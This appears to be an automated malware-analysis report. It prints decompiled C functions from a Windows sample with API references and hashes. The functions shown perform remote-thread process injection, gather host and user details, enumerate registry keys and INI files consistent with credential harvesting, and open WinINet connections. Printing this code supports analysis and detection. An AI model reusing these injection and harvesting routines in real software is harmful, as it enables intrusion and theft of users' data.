    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
    • String ID:
    • API String ID: 1974014688-0
    • Opcode ID: f569c9eb8a952e84e56e737c839da9d948d02843f5272fe091707570e06a9856
    • Instruction ID: 3417aaef229067658624a6b052d9febd99a0542ca82a5b406a3ed3d9ed21ecc7
    • Opcode Fuzzy Hash: f569c9eb8a952e84e56e737c839da9d948d02843f5272fe091707570e06a9856
    • Instruction Fuzzy Hash: ED11B271100600BFDB214F61CD49EBB7BB8EBA4700F10892EF592D66B0E735A980DB28
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E0041D15A(struct HWND__* _a4, struct HRGN__* _a8, int _a12) {
    				void* _t21;
    				int _t22;
    				signed int _t23;
    				struct HWND__* _t27;
    				char* _t31;
    
    				_t27 = _a4;
    				if(( *0x422b98 & 0x00000004) == 0 || E0040EEE1() == 0) {
    					L7:
    					return GetUpdateRgn(_t27, _a8, _a12);
    				} else {
    					_t31 = TlsGetValue( *0x4228e4);
    					if(_t31 == 0 || _t27 !=  *((intOrPtr*)(_t31 + 4))) {
    						goto L7;
    					} else {
    						SetRectRgn(_a8,  *(_t31 + 0xc),  *(_t31 + 0x10),  *(_t31 + 0x14),  *(_t31 + 0x18));
    						if(_a12 != 0) {
    							_t22 = SaveDC( *(_t31 + 8));
    							_t23 = SendMessageW(_t27, 0x14,  *(_t31 + 8), 0);
    							asm("sbb eax, eax");
    							 *((intOrPtr*)(_t31 + 0x1c)) =  ~_t23 + 1;
    							RestoreDC( *(_t31 + 8), _t22);
    						}
    						 *_t31 = 1;
    						_t21 = 2;
    						return _t21;
    					}
    				}
    			}

    APIs
    • GetUpdateRgn.USER32 ref: 0041D1E2
      • Part of subcall function 0040EEE1: WaitForSingleObject.KERNEL32(00000000,004162FC,00000318,00000000,00000318,909011A5,00000002), ref: 0040EEE9
    • TlsGetValue.KERNEL32 ref: 0041D17A
    • SetRectRgn.GDI32(?,?,?,?,?), ref: 0041D19A
    • SaveDC.GDI32(?), ref: 0041D1AA
    • SendMessageW.USER32(?,00000014,?,00000000), ref: 0041D1BA
    • RestoreDC.GDI32(?,00000000), ref: 0041D1CC
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
    • String ID:
    • API String ID: 3142230470-0
    • Opcode ID: 277d0a3bb1c0b5a8ba2a5a36c9c650d4c3ad2a805e93b05a1217f5295ca162de
    • Instruction ID: 4477886e3693d709ad831b2e702d9f70507c2f4a7814e474dc9affc410d63054
    • Opcode Fuzzy Hash: 277d0a3bb1c0b5a8ba2a5a36c9c650d4c3ad2a805e93b05a1217f5295ca162de
    • Instruction Fuzzy Hash: BF119A71400741BFCB325F60EE48E96BFB5FB09710F00492AFA97A1671C376A490DB68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E00415A2B(void* __ecx, long _a4, intOrPtr _a8) {
    				char _v5;
    				void* __edi;
    				void* __esi;
    				void* _t10;
    				void* _t14;
    				void* _t23;
    				void* _t25;
    				void* _t26;
    
    				_t21 = __ecx;
    				_push(__ecx);
    				_v5 = 0;
    				_t23 = OpenProcess(0x47a, 0, _a4);
    				_t28 = _t23;
    				if(_t23 != 0) {
    					_push(_t25);
    					_t10 = E0040EDF6(_t21, _t23, _t25, _t28, _a8, 0);
    					_t26 = _t10;
    					if(_t26 != 0) {
    						_t14 = CreateRemoteThread(_t23, 0, 0, _t10 -  *0x422bac + E0040F5B1, 0, 0, 0);
    						_a4 = _t14;
    						if(_t14 == 0) {
    							VirtualFreeEx(_t23, _t26, 0, 0x8000);
    						} else {
    							WaitForSingleObject(_t14, 0x2710);
    							CloseHandle(_a4);
    							_v5 = 1;
    						}
    					}
    					CloseHandle(_t23);
    				}
    				return _v5;
    			}

    APIs
    • OpenProcess.KERNEL32(0000047A,00000000,74B5F560,00000000,74B5F560,?,?,00415BE3,?,?,00000000,?,74B5F560,00000000), ref: 00415A3F
    • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-0083215D,00000000,00000000,00000000), ref: 00415A6D
    • WaitForSingleObject.KERNEL32(00000000,00002710,?,00415BE3,?,?,00000000,?,74B5F560,00000000), ref: 00415A80
    • CloseHandle.KERNEL32(74B5F560,?,00415BE3,?,?,00000000,?,74B5F560,00000000), ref: 00415A89
    • VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,00415BE3,?,?,00000000,?,74B5F560,00000000), ref: 00415A9D
    • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00415BE3,?,?,00000000,?,74B5F560,00000000), ref: 00415AA4
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: CloseHandle$CreateFreeObjectOpenProcessRemoteSingleThreadVirtualWait
    • String ID:
    • API String ID: 14861764-0
    • Opcode ID: 8220b198f7b67531fb22bddd8be1d97469799202e3700ddd72e63d850d6cfad6
    • Instruction ID: 47e51c9887388b09ab39a5e6fea5a819ba18c86b18ad0d6ae4c51121a33a3c69
    • Opcode Fuzzy Hash: 8220b198f7b67531fb22bddd8be1d97469799202e3700ddd72e63d850d6cfad6
    • Instruction Fuzzy Hash: 86019EB2144148BFDB105FA4DCC8EEF3EACDB893D4B04813AFA45E6160C6794D858678
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 41%
    			E00404EA2(char* __ecx, void* __edx, signed int _a4, signed int _a8) {
    				char _v5;
    				signed int _v12;
    				char _v20;
    				char _v64;
    				char _v552;
    				char _v556;
    				short _v588;
    				void* __ebx;
    				void* __esi;
    				signed int _t62;
    				signed int _t64;
    				signed int _t65;
    				signed short _t71;
    				signed short _t75;
    				void* _t92;
    				void* _t95;
    				void* _t97;
    				signed short _t99;
    				void* _t100;
    				void* _t101;
    				void* _t102;
    				void* _t103;
    				void* _t104;
    				void* _t105;
    				void* _t109;
    				signed int _t111;
    				char* _t112;
    				void* _t113;
    
    				_t109 = __edx;
    				_t106 = __ecx;
    				_t111 = _a4;
    				_t114 =  *_t111;
    				_t99 = 1;
    				_v5 = 0;
    				if( *_t111 == 0) {
    					_t97 = E0041BC8B(_t114);
    					 *_t111 = _t97;
    					if(_t97 == 0) {
    						return 0;
    					}
    					_v5 = 1;
    				}
    				__eflags = _a8 & 0x00000001;
    				if((_a8 & 0x00000001) == 0) {
    					L9:
    					__eflags = _a8 & 0x00000002;
    					if((_a8 & 0x00000002) != 0) {
    						_push( &_v12);
    						_push(0x20000);
    						_push(0x2713);
    						_t105 = 4;
    						_v12 = 0x2030309;
    						_t99 = E0041BC9F(_t111, _t105);
    					}
    					L11:
    					__eflags = _a8 & 0x00000004;
    					if((_a8 & 0x00000004) == 0) {
    						L16:
    						__eflags = _t99;
    						if(_t99 == 0) {
    							L32:
    							__eflags = _v5 - 1;
    							if(_v5 == 1) {
    								E004163A8( *_t111);
    								 *_t111 =  *_t111 & 0x00000000;
    								__eflags =  *_t111;
    							}
    							L34:
    							return _t99;
    						}
    						__eflags = _a8 & 0x00000008;
    						if((_a8 & 0x00000008) == 0) {
    							L20:
    							__eflags = _t99;
    							if(_t99 == 0) {
    								goto L32;
    							}
    							__eflags = _a8 & 0x00000010;
    							if((_a8 & 0x00000010) == 0) {
    								L28:
    								__eflags = _t99;
    								if(_t99 == 0) {
    									goto L32;
    								}
    								__eflags = _a8 & 0x00000020;
    								if((_a8 & 0x00000020) != 0) {
    									E00404DEE(_t106, _t111, 2);
    									E00404DEE(_t106, _t111, 0x17);
    								}
    								goto L34;
    							}
    							_t62 = GetModuleFileNameW(0,  &_v588, 0x103);
    							_a4 = _t62;
    							__eflags = _t62;
    							if(_t62 != 0) {
    								__eflags = 0;
    								 *((short*)(_t113 + _t62 * 2 - 0x248)) = 0;
    								_t106 =  &_v588;
    								_t99 = E0041BD4C(_t62,  &_v588, _t109, 0, _t111, 0x271e);
    							}
    							_a4 = 0x104;
    							__eflags = _t99;
    							if(_t99 == 0) {
    								goto L32;
    							} else {
    								_t64 =  &_v588;
    								__imp__GetUserNameExW(2, _t64,  &_a4);
    								__eflags = _t64;
    								if(_t64 != 0) {
    									_t65 = _a4;
    									__eflags = _t65;
    									if(_t65 != 0) {
    										__eflags = 0;
    										 *((short*)(_t113 + _t65 * 2 - 0x248)) = 0;
    										_t106 =  &_v588;
    										_t99 = E0041BD4C(_t65,  &_v588, _t109, 0, _t111, 0x271f);
    									}
    								}
    								goto L28;
    							}
    						}
    						_t112 =  &_v20;
    						E0040E447(_t112);
    						_push(_t112);
    						_push(0x20000);
    						_push(0x271c);
    						_t100 = 6;
    						_t71 = E0041BC9F(_a4, _t100);
    						_t99 = _t71;
    						__eflags = _t99;
    						if(_t99 == 0) {
    							_t111 = _a4;
    							goto L32;
    						}
    						__imp__GetUserDefaultUILanguage();
    						_v12 = _t71 & 0x0000ffff;
    						_push( &_v12);
    						_push(0x20000);
    						_push(0x271d);
    						_t101 = 2;
    						_t75 = E0041BC9F(_a4, _t101);
    						_t111 = _a4;
    						_t99 = _t75;
    						goto L20;
    					}
    					__eflags = _t99;
    					if(_t99 == 0) {
    						goto L32;
    					}
    					_v12 = E004164AA();
    					_push( &_v12);
    					_push(0x20000);
    					_push(0x2719);
    					_t102 = 4;
    					_t99 = E0041BC9F(_t111, _t102);
    					__eflags = _t99;
    					if(_t99 == 0) {
    						goto L32;
    					}
    					_v12 = E004164D2();
    					_push( &_v12);
    					_push(0x20000);
    					_push(0x271b);
    					_t103 = 4;
    					_t99 = E0041BC9F(_t111, _t103);
    					__eflags = _t99;
    					if(_t99 == 0) {
    						goto L32;
    					}
    					_v12 = GetTickCount();
    					_push( &_v12);
    					_push(0x20000);
    					_push(0x271a);
    					_t104 = 4;
    					_t99 = E0041BC9F(_t111, _t104);
    					goto L16;
    				}
    				_t92 = E0040F087(_t106,  &_v556);
    				_t106 =  &_v552;
    				_t99 = E0041BD4C(_t92,  &_v552, _t109, __eflags, _t111, 0x2711);
    				__eflags = _t99;
    				if(_t99 == 0) {
    					goto L11;
    				}
    				_t95 = E0040F1E7( &_v552,  &_v64);
    				__eflags = _v64;
    				if(__eflags != 0) {
    					_t106 =  &_v64;
    					_t99 = E0041BD4C(_t95,  &_v64, _t109, __eflags, _t111, 0x2712);
    				}
    				__eflags = _t99;
    				if(_t99 == 0) {
    					goto L11;
    				}
    				goto L9;
    			}

    APIs
    • GetTickCount.KERNEL32 ref: 00404FA1
    • GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?), ref: 00404FF4
    • GetModuleFileNameW.KERNEL32(00000000,?,00000103), ref: 00405036
    • GetUserNameExW.SECUR32(00000002,?,00000104), ref: 00405078
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: NameUser$CountDefaultFileLanguageModuleTick
    • String ID:
    • API String ID: 2256650695-3916222277
    • Opcode ID: 9542bdbe358d296b74b1ad62f22883fa16b04c325b4f519f60f2310b5e50a746
    • Instruction ID: 1e18e3d7d8df62da46e1ad7ff54b50ea9d24a47e102682491c65d87806719bcd
    • Opcode Fuzzy Hash: 9542bdbe358d296b74b1ad62f22883fa16b04c325b4f519f60f2310b5e50a746
    • Instruction Fuzzy Hash: E051C9716413487ADB10AF65DC49BDF7BA8DF42304F08406BBA44BF2C1DB7999848B98
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 67%
    			E0040E4C6(void* _a4, WCHAR* _a8) {
    				char _v40;
    				char _v160;
    				char _v680;
    				void* __edi;
    				void* __esi;
    				void** _t11;
    				void* _t13;
    				void* _t16;
    				void* _t18;
    				void* _t23;
    				void* _t28;
    				void* _t30;
    				WCHAR* _t34;
    
    				_t11 =  &_a4;
    				_t28 = 0;
    				__imp__ConvertSidToStringSidW(_a4, _t11);
    				if(_t11 != 0) {
    					_t37 =  &_v160;
    					_t13 = 4;
    					E0040FA33(_t13,  &_v160);
    					_push(_a4);
    					_t34 =  &_v680;
    					_t16 = E0041709B(_t37, 0x104, _t34, _t37);
    					_pop(_t30);
    					if(_t16 > 0) {
    						_t18 = 5;
    						E0040FA33(_t18,  &_v40);
    						_t23 = E0041A4CC(0x80000002, _t30, _t34, _t34,  &_v40, 0x104);
    						if(_t23 != 0 && _t23 != 0xffffffff) {
    							PathUnquoteSpacesW(_t34);
    							ExpandEnvironmentStringsW(_t34, _a8, 0x104);
    							asm("sbb bl, bl");
    							_t28 = 1;
    						}
    					}
    					LocalFree(_a4);
    				}
    				return _t28;
    			}

    APIs
    • ConvertSidToStringSidW.ADVAPI32(?,?), ref: 0040E4D9
    • LocalFree.KERNEL32(?,.exe,00000000), ref: 0040E561
      • Part of subcall function 0041A4CC: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0040E535,?,?,00000104,.exe,00000000), ref: 0041A4E1
    • PathUnquoteSpacesW.SHLWAPI(?,?,?,00000104,.exe,00000000), ref: 0040E541
    • ExpandEnvironmentStringsW.KERNEL32(?,004097F1,00000104), ref: 0040E54E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: ConvertEnvironmentExpandFreeLocalOpenPathSpacesStringStringsUnquote
    • String ID: .exe
    • API String ID: 2200435814-4119554291
    • Opcode ID: 27c302094f5ca439a91159505e5f9a1c7cdac35a0dc2bbfa1433aaf21669ec4a
    • Instruction ID: 3ddb389e04ce27eed32a34c3266d53fe9de05c99f3e1a2e70141092bac62231b
    • Opcode Fuzzy Hash: 27c302094f5ca439a91159505e5f9a1c7cdac35a0dc2bbfa1433aaf21669ec4a
    • Instruction Fuzzy Hash: 1B11E3726001046BDB20AB7ADD09ACB3BACDF44324F000936B958F31A1DA39DA49CBA4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004080CB(void* __edx) {
    				void _v108;
    				char _v120;
    				char _v212;
    				long _v216;
    				char _v224;
    				void* __esi;
    				void* _t8;
    				void* _t16;
    
    				_t16 = __edx;
    				_t8 = GetThreadDesktop(GetCurrentThreadId());
    				if(_t8 != 0) {
    					_t8 = GetUserObjectInformationW(_t8, 2,  &_v108, 0x64,  &_v216);
    					if(_t8 != 0 && _v216 == 0x4e) {
    						E0040ED80(0x2937498d,  &_v212, 0);
    						_t8 = E00416419( &_v224,  &_v120, 0x4c);
    						if(_t8 == 0) {
    							_t8 = E00407CD9( &_v120, _t16, 0x4228e0, _t8);
    							if(_t8 == 0) {
    								_t8 = E00407F44(0x4228e0, 0);
    							} else {
    								 *0x422b98 =  *0x422b98 | 0x00000004;
    							}
    						}
    					}
    				}
    				return _t8;
    			}

    APIs
    • GetCurrentThreadId.KERNEL32 ref: 004080D8
    • GetThreadDesktop.USER32(00000000), ref: 004080DF
    • GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 004080F8
      • Part of subcall function 00407CD9: TlsAlloc.KERNEL32(004228E0,00000000,0000018C,00000000,00000000), ref: 00407CF2
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Thread$AllocCurrentDesktopInformationObjectUser
    • String ID: N$(B
    • API String ID: 454308152-4076436461
    • Opcode ID: 56ab13a3b8b23d419e87125e6f3566ca491d3beb6f87944971a0b72e03f70ba9
    • Instruction ID: e58d89df9795c67907d30c683fd5755cbd39ffbafc00000c1142f65a35a4cd7a
    • Opcode Fuzzy Hash: 56ab13a3b8b23d419e87125e6f3566ca491d3beb6f87944971a0b72e03f70ba9
    • Instruction Fuzzy Hash: E80184706043056AE610AF619F46FAB739CAF00724F40453EFA95B61E0EF78E905C65F
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00417F7C(signed int __eax, char* __ecx) {
    				short _v28;
    				char* _v32;
    				signed int _t5;
    				void* _t12;
    				void* _t14;
    				char* _t15;
    				void* _t18;
    
    				_t15 = __ecx;
    				_t5 = __eax;
    				if(__ecx == 0) {
    					_t15 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)";
    				}
    				_t14 = InternetOpenA(_t15,  !_t5 & 0x00000001, 0, 0, 0);
    				if(_t14 == 0) {
    					L7:
    					return 0;
    				}
    				_t18 = 0;
    				do {
    					_t1 = _t18 + 0x42200c; // 0x42200c
    					_t2 = _t18 + 0x422008; // 0x2
    					InternetSetOptionA(_t14,  *_t2, _t1, 4);
    					_t18 = _t18 + 8;
    				} while (_t18 < 0x18);
    				_t12 = InternetConnectA(_t14, _v32, _v28, 0, 0, 3, 0, 0);
    				if(_t12 == 0) {
    					InternetCloseHandle(_t14);
    					goto L7;
    				}
    				return _t12;
    			}

    APIs
    • InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 00417F93
    • InternetSetOptionA.WININET(00000000,00000002,0042200C,00000004), ref: 00417FB2
    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00417FCF
    • InternetCloseHandle.WININET(00000000), ref: 00417FDB
    Strings
    • Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1), xrefs: 00417F84, 00417F92
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Internet$CloseConnectHandleOpenOption
    • String ID: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
    • API String ID: 910987326-3737944857
    • Opcode ID: 001633508bdec48a5cbde64b8784d1cb2dcce620f70cf4de1caf6a5037f5e4b5
    • Instruction ID: 233fdcc74de1c4df476598a684af1a1d63bf04d2232e1abe6ca04bd1acb3866e
    • Opcode Fuzzy Hash: 001633508bdec48a5cbde64b8784d1cb2dcce620f70cf4de1caf6a5037f5e4b5
    • Instruction Fuzzy Hash: EBF0F0722042007BEA2257629D8CDAB7A7EEBC9B15B04042EF646E1030CA358991C778
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 54%
    			E004183F0() {
    				char _v8;
    				struct HINSTANCE__* _v12;
    				void* _v1036;
    				struct HINSTANCE__* _t13;
    				_Unknown_base(*)()* _t15;
    				char _t22;
    				void* _t28;
    
    				_t22 = 0;
    				_t13 = LoadLibraryA("urlmon.dll");
    				_v12 = _t13;
    				if(_t13 != 0) {
    					_t15 = GetProcAddress(_t13, "ObtainUserAgentString");
    					if(_t15 != 0) {
    						_push( &_v8);
    						_push( &_v1036);
    						_push(0);
    						_v8 = 0x3ff;
    						_v1036 = 0;
    						if( *_t15() == 0) {
    							if(_v8 > 0x3ff) {
    								_v8 = 0x3ff;
    							}
    							 *((char*)(_t28 + _v8 - 0x408)) = _t22;
    							_t22 = E00416806( &_v1036 | 0xffffffff,  &_v1036);
    						}
    					}
    					FreeLibrary(_v12);
    				}
    				return _t22;
    			}

    APIs
    • LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 00418401
    • GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 00418414
    • FreeLibrary.KERNEL32(?), ref: 00418466
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Library$AddressFreeLoadProc
    • String ID: ObtainUserAgentString$urlmon.dll
    • API String ID: 145871493-2685262326
    • Opcode ID: 115aea22a974dab37f59f2a5b76d22246288a45edcbd9793065513e056ebc81b
    • Instruction ID: 37e9883a60be7ee82cd010c877e0619590b6ab9ba2e3da3fd6febc6d00d26d22
    • Opcode Fuzzy Hash: 115aea22a974dab37f59f2a5b76d22246288a45edcbd9793065513e056ebc81b
    • Instruction Fuzzy Hash: EC0148B1D01259BFCB10ABE49E849DE7BB8AB04314F2045BEE655F3290DD748E848B69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E0040BACA(char* __ecx, void* __eflags) {
    				int _v8;
    				void* _v12;
    				signed int _v16;
    				char* _v20;
    				intOrPtr _v24;
    				int _v28;
    				intOrPtr _v32;
    				char _v36;
    				void* _v40;
    				intOrPtr _v44;
    				char* _v48;
    				char _v60;
    				char _v80;
    				char _v100;
    				char _v120;
    				char _v152;
    				char _v216;
    				char _v284;
    				short _v804;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t70;
    				int _t102;
    				int _t110;
    				int _t114;
    				void* _t115;
    				signed int _t117;
    				void* _t119;
    				intOrPtr _t121;
    				void* _t124;
    				intOrPtr _t127;
    				int _t134;
    				intOrPtr _t136;
    				char* _t138;
    				char* _t141;
    				signed int _t145;
    				void* _t146;
    				void* _t147;
    
    				_t129 = __ecx;
    				_t70 = E00416378(0xc08);
    				_t127 = _t70;
    				_t134 = 0;
    				_v24 = _t127;
    				if(_t127 == 0) {
    					return _t70;
    				} else {
    					E0040FA33(0x83,  &_v216);
    					_t141 =  &_v284;
    					E0040FA33(0x84, _t141);
    					_v48 =  &_v216;
    					_v44 = _t141;
    					E0041645B( &_v36,  &_v36, 0, 8);
    					E0040FA33(0x85,  &_v120);
    					E0040FA33(0x86,  &_v100);
    					E0040FA33(0x87,  &_v60);
    					_t145 =  &_v80;
    					E0040FA33(0x88, _t145);
    					_t12 = _t127 + 0x3fc; // 0x3fc
    					_v20 = _t12;
    					_v16 = 0;
    					do {
    						if(RegOpenKeyExW(0x80000001,  *(_t146 + _v16 * 4 - 0x2c), _t134, 8,  &_v12) != 0) {
    							goto L22;
    						}
    						_v28 = _t134;
    						_v8 = 0x104;
    						if(RegEnumKeyExW(_v12, _t134,  &_v804,  &_v8, _t134, _t134, _t134, _t134) != 0) {
    							L21:
    							RegCloseKey(_v12);
    							goto L22;
    						} else {
    							goto L4;
    						}
    						do {
    							L4:
    							_t136 = _v24;
    							_v28 = _v28 + 1;
    							_t102 = E0041A4CC(_v12, _t129, _t136,  &_v804,  &_v120, 0xff);
    							_t145 = _t145 | 0xffffffff;
    							_v8 = _t102;
    							if(_t102 != _t145 && _t102 != 0) {
    								_t137 = _t136 + 0x1fe;
    								_t110 = E0041A4CC(_v12, _t129, _t136 + 0x1fe,  &_v804,  &_v100, 0xff);
    								_v8 = _t110;
    								if(_t110 == _t145 || _t110 == 0) {
    									_t114 = E0041A4CC(_v12, _t129, _t137,  &_v804,  &_v60, 0xff);
    									_v8 = _t114;
    									if(_t114 == _t145 || _t114 == 0) {
    										goto L19;
    									} else {
    										goto L10;
    									}
    								} else {
    									L10:
    									_t115 = _v12;
    									_t129 =  &_v804;
    									_v40 = _t115;
    									if(RegOpenKeyExW(_t115,  &_v804, 0, 1,  &_v40) != 0) {
    										_t117 = _t145;
    									} else {
    										_t145 =  &_v40;
    										_t117 = E0041A5F4(_t145,  &_v80, _t116, _v20, 0xff);
    									}
    									_v8 = _t117;
    									if(_t117 != 0xffffffff && _t117 != 0) {
    										_t138 = _v20;
    										if(E0040BA70(_t138) > 0) {
    											_t145 =  &_v152;
    											_t119 = 0x56;
    											E0040FA33(_t119, _t145);
    											_t121 = _v24;
    											_push(_t121);
    											_t129 = _t138;
    											_push(_t138);
    											_push(_t121 + 0x1fe);
    											_t124 = E0041709B(_t145, 0x307, _t138 + 0x1fe, _t145);
    											_t147 = _t147 + 0x10;
    											if(_t124 > 0) {
    												_t129 =  &_v36;
    												if(E0041679C(_t124,  &_v36, _v20 + 0x1fe) != 0) {
    													_v32 = _v32 + 1;
    												}
    											}
    										}
    									}
    									goto L19;
    								}
    							}
    							L19:
    							_v8 = 0x104;
    						} while (RegEnumKeyExW(_v12, _v28,  &_v804,  &_v8, 0, 0, 0, 0) == 0);
    						_t134 = 0;
    						goto L21;
    						L22:
    						_v16 = _v16 + 1;
    					} while (_v16 < 2);
    					E004163A8(_v24);
    					if(_v32 <= _t134) {
    						return E004163A8(_v36);
    					}
    					return E004099E1(0x307, _v36, 0xcb);
    				}
    			}

    APIs
    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 0040BB81
    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040BBAC
    • RegCloseKey.ADVAPI32(?), ref: 0040BD02
      • Part of subcall function 0041A4CC: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0040E535,?,?,00000104,.exe,00000000), ref: 0041A4E1
    • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 0040BCEF
      • Part of subcall function 0041A4CC: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,0040E535,?,?,00000104), ref: 0041A562
    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?,?,?,000000FF,?,?,000000FF,?,?,000000FF), ref: 0040BC4C
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Open$Enum$CloseEnvironmentExpandStrings
    • String ID:
    • API String ID: 2343474859-0
    • Opcode ID: 217e9c16c3478ef97a51a3403a6901c047e2c684b70e534788975e95918b5a9c
    • Instruction ID: 85b80d4268bffbcee80a7b021e4d16a8010a9ab3eb35ca381ebdbd4bde21d4ba
    • Opcode Fuzzy Hash: 217e9c16c3478ef97a51a3403a6901c047e2c684b70e534788975e95918b5a9c
    • Instruction Fuzzy Hash: 11713C71E00219ABDF11DBA5CD45AEEB7BCEF48304F14007AB905F3291DB389E459BA8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E0040AB90(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
    				short _v524;
    				char _v564;
    				short _v576;
    				short _v588;
    				short _v600;
    				short _v608;
    				WCHAR* _v612;
    				WCHAR* _v616;
    				WCHAR* _v620;
    				WCHAR* _v624;
    				WCHAR* _v628;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				WCHAR* _t51;
    				WCHAR* _t54;
    				WCHAR* _t56;
    				void* _t57;
    				void* _t59;
    				void* _t61;
    				void* _t63;
    				long _t67;
    				WCHAR* _t69;
    				long _t77;
    				long _t80;
    				WCHAR* _t82;
    				void* _t83;
    				WCHAR* _t86;
    				WCHAR* _t87;
    				short* _t92;
    				WCHAR* _t93;
    				int _t102;
    				WCHAR* _t107;
    				intOrPtr _t114;
    				signed int _t115;
    				void* _t117;
    
    				_t117 = (_t115 & 0xfffffff8) - 0x26c;
    				if(E0041BC2F( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
    					L19:
    					return 1;
    				}
    				_t120 =  *__edx & 0x00000010;
    				if(( *__edx & 0x00000010) == 0) {
    					_t107 = E00416378(0x1fffe);
    					_v612 = _t107;
    					__eflags = _t107;
    					if(_t107 == 0) {
    						goto L19;
    					}
    					_t51 = GetPrivateProfileStringW(0, 0, 0, _t107, 0xffff,  &_v524);
    					__eflags = _t51;
    					if(_t51 == 0) {
    						L18:
    						E004163A8(_t107);
    						goto L19;
    					}
    					_t9 =  &(_t51[0]); // 0x1
    					_t54 = E00417258(_t107, _t9);
    					__eflags = _t54;
    					if(_t54 == 0) {
    						goto L18;
    					}
    					_t56 = E00416378(0xc1c);
    					_v620 = _t56;
    					__eflags = _t56;
    					if(_t56 != 0) {
    						_t11 =  &(_t56[0xff]); // 0x1fe
    						_t92 = _t11;
    						_v624 = _t107;
    						_v616 = _t92;
    						_t57 = 0x5c;
